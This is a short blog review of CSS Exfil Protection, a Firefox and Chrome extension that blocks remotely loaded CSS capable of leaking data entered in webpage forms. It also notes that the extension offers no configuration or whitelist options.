CSS Exfil Protection : Prevents CSS Data Leak in Firefox and Chrome

CSS Exfil Protection is an extension for the Firefox and Chrome browsers that claims to block malicious CSS code that could be used to leak your data. It blocks imported CSS or remote linked CSS code that could be secretly capturing the data entered in various field of a webpage.

CSS (cascading style sheets) are an integral part of webpages and cannot be fully turned off without breaking down various websites. Through the CSS code, a web designers decides how the website is going to look and work. More and more websites are using CMS like WordPress or Joomla which heavily depend on CSS and JavaScript. These websites will be crippled if you disable CSS on them.

CSS Exfil Protection

While completely turning off CSS is not possible or desired, CSS Exfil Protection can selectively block any attempts to load the CSS code from remote location. After the installation, it keeps monitoring all the webpages that you open and scans the loaded CSS code for any suspicious items. When such items are detected, it blocks them and shows the number of items blocked in the toolbar icon.

This extension is created by Mike Gualtieri and you can read more about how CSS data leak works on his blog. He has also provided some PoC examples and a browser tester webpage. You can basically visit this webpage and it will perform four different types of tests to see if your web browser can circumvent CSS based data leaks.

CSS Exfil Protection

Unfortunately, the extension does not provide any configurable options to the end user. You cannot whistelist any website so that it can avoid blocking any kind of CSS on that website. Furthermore, it assumes that remote fetching of data through CSS is malicious which means that even the harmless websites with harmless CSS are given the same treatment as the possible rogue webpages with malicious CSS code.

You can get CSS Exfil Protection extension for Firefox and Chrome from https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense.

One comment

Comments are closed.